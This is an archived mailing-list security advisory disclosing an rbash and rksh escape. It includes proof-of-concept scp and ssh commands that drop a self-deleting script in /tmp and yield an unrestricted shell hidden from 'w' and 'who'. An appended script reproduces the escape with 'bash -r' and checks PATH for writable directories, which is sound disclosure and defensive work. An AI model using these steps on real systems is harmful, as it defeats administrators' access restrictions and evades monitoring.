I have recently realized a security issue in some of the restricted shells on
*NIX systems. I am not sure if I am the first one to discover the problem I am
going to discuss, but I am sure that it has not been posted yet, at least not
that I know of. Basically this is the issue:

Affected Systems:
=================
Any Unix systems that I am aware of using restricted shells (rbash, rksh)

Description:
============
An authorized user that is set to use rbash or rksh is able to escape the
restricted shell environment and then further exploit the system. The problem
comes from the fact that when a command is executed from the shell and it is
found to be a shell procedure, then rksh or rbash is invoked to execute it.

Proof:
======
One needs to store the shell script in a world-writable directory like /tmp or
/usr/tmp, so let's assume the server is running sshd (this is also exploitable
through rsh). In this case store in a file called anything you want (I will use
.tmp123) the following:

---
/usr/bin/bash
rm -Rf /tmp/.tmp123
---

Then execute the following:

$scp ./.tmp123 user@host:/tmp
user@host's password:
Done.
$ssh -l user host '/tmp/.tmp123'
user@host's password:
_

You should now have a normal bash shell instead of the original rbash. Also a
great plus to doing this is that whenever you follow the procedure above the
commands 'w' and 'who' cannot detect your presence. However 'ps' does show the
intruder's presence.

Fix:
====
I am not aware of any except maybe an attempt to retune the system. If anyone
has any ideas please e-mail me.

A. Dimitrov
System Administrator
Georgia College & State University
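The following is an added example, not part of the post above and not the
poster's code. It reproduces the mechanism the post describes on the local
machine with `bash -r` (bash's restricted mode, the same mode rbash starts in)
rather than rbash behind sshd, and goes one step further than the post by
showing the precondition an administrator can check for: a directory on the
restricted user's PATH that the user can write to. It assumes only that bash is
installed; the function names, the temporary directory and the use of the
post's .tmp123 file name are this example's own choices.

```bash
#!/bin/sh
# Added example (not from the original post): reproduce the rbash escape
# locally with `bash -r`, then check the precondition an administrator
# cares about. Assumes bash is installed; everything else is constructed.

BASH_BIN=$(command -v bash)

# Run one command line under a restricted bash whose PATH is $1.
# stdout and stderr are merged so the shell's refusals are visible, and
# "|| true" keeps a refused command from aborting the caller.
run_restricted() {
    PATH="$1" "$BASH_BIN" -r -c "$2" 2>&1 || true
}

# Restrictions hold for commands typed directly: cd and a slash in a
# command name are both refused with a "restricted" message. Returns 0
# when both refusals are seen.
restrictions_hold() {
    out_cd=$(run_restricted "/usr/bin:/bin" 'cd /')
    out_slash=$(run_restricted "/usr/bin:/bin" '/bin/echo escaped')
    case "$out_cd" in *restricted*) ;; *) return 1 ;; esac
    case "$out_slash" in *restricted*) ;; *) return 1 ;; esac
    return 0
}

# The escape: drop a plain shell procedure (no #! line, like the post's
# .tmp123) into a directory on the restricted shell's PATH and run it by
# name, so the command word contains no slash. bash finds the file is a
# script and re-executes itself on it with the restrictions turned off,
# so the cd refused above now succeeds. Prints the working directory
# reported from inside the script, which is "/".
escape_via_script() {
    dir=$(mktemp -d)
    printf 'cd /\npwd\n' > "$dir/.tmp123"
    chmod 755 "$dir/.tmp123"
    run_restricted "$dir:/usr/bin:/bin" '.tmp123'
    rm -rf "$dir"
}

# The administrator's check: which entries of a PATH string ($1) the
# current user can write to. Each one is a place to drop the script
# above. Prints the writable entries one per line; run it as the
# restricted user, with the PATH that user's startup files set.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
}

# Stand-alone run: the refusals, the escape, then the PATH check.
restrictions_hold && echo "restricted bash refuses cd and /bin/echo"
echo "pwd inside the dropped script: $(escape_via_script)"
echo "writable entries on this PATH: $(writable_path_dirs "$PATH" | tr '\n' ' ')"
```

The escape needs two things the post takes for granted: a directory the
restricted user can write to, and a way to get the restricted shell to execute
a file there without naming it with a slash (here, having the directory on
PATH). The last function checks the first of those; the same file with a
#!/usr/bin/env bash line would escape just as well, because then the kernel
starts an ordinary bash directly.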
This archive was generated by hypermail 2b30 : Thu Apr 18 2002 - 17:38:34 PDT